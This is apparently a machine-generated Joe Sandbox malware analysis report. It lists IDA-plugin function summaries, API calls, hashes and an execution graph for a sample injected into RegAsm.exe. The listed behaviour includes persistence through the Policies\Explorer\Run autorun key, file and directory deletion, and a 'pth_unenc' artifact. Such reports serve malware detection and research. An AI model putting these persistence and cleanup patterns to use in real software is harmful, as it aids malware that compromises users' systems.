                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                          • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                          • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteDirectoryFileRemove
                                                          • String ID: pth_unenc
                                                          • API String ID: 3325800564-4028850238
                                                          • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                          • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                          • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                          • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                          APIs
                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ObjectProcessSingleTerminateWait
                                                          • String ID: pth_unenc
                                                          • API String ID: 1872346434-4028850238
                                                          • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                          • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                          • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                          • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CommandLine
                                                          • String ID: P0W
                                                          • API String ID: 3253501508-3115582726
                                                          • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                          • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                                                          • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                          • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CommandLine
                                                          • String ID: P0W
                                                          • API String ID: 3253501508-3115582726
                                                          • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                          • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                                          • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                          • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                          • GetLastError.KERNEL32 ref: 00440D35
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                          • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                          • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                          • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                          • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                          • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastRead
                                                          • String ID:
                                                          • API String ID: 4100373531-0
                                                          • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                          • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                          • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                          • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

                                                          Execution Graph

                                                          Execution Coverage:5.4%
                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1990
                                                          Total number of Limit Nodes:56
                                                          execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab ??3@YAXPAX ??3@YAXPAX 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab ??3@YAXPAX ??3@YAXPAX 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 ??3@YAXPAX 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 ??3@YAXPAX 37849->37851 37852 40b1ab ??3@YAXPAX ??3@YAXPAX 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a ??3@YAXPAX 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 ??3@YAXPAX 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 ??3@YAXPAX 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 ??3@YAXPAX 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc ??3@YAXPAX 37904->37906 37908 4099f4 3 API calls 37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 ??3@YAXPAX 38059->38060 38061 40ea88 38060->38061 38062 40aa04 ??3@YAXPAX 38061->38062 38063 40ea90 38062->38063 38064 40aa04 ??3@YAXPAX 38063->38064 38065 40ea98 38064->38065 38066 40aa04 ??3@YAXPAX 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 ??3@YAXPAX 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 ??3@YAXPAX 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab ??3@YAXPAX ??3@YAXPAX 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab ??3@YAXPAX ??3@YAXPAX 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab ??3@YAXPAX ??3@YAXPAX 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab ??3@YAXPAX ??3@YAXPAX 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab ??3@YAXPAX ??3@YAXPAX 38382->38778 38384 40c788 38779 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38779 38386 40c790 38780 40b1ab ??3@YAXPAX ??3@YAXPAX 38386->38780 38388 40c798 38389 40aa04 ??3@YAXPAX 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 